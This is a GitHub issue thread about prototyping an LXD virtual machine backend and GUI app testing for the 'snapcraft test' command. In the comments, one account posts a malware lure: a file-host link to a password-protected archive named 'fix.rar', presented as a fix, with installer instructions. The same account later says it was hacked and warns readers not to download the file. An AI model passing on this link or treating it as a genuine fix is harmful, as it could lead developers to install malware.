### ISSUE TITLE
Prototype LXD VMs backend and GUI testing for `snapcraft test`

### ISSUE THREAD

**Issue by mr-cal** [canonical/snapcraft#5002]
### What needs to get done

Extend the [snapcraft](https://github.com/canonical/craft-application/tree/work/CRAFT-2991-test-command-prototype) and [craft-application](https://github.com/canonical/craft-application/tree/work/CRAFT-2991-test-command-prototype) prototypes to:

* Add an ad-hoc VM for LXD VMs
* Test on Ubuntu and non-ubuntu VMs (like Fedora)
* Test GUI apps similar to snapcrafter's CI

### Why it needs to get done

To complete the prototype for `snapcraft test`

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by 0xab01** [comment]
alert: my account has been hacked and someone is sending everywhere 200 mb
files that could be malware.

**Comment by 0xab01** [comment]
please dont download
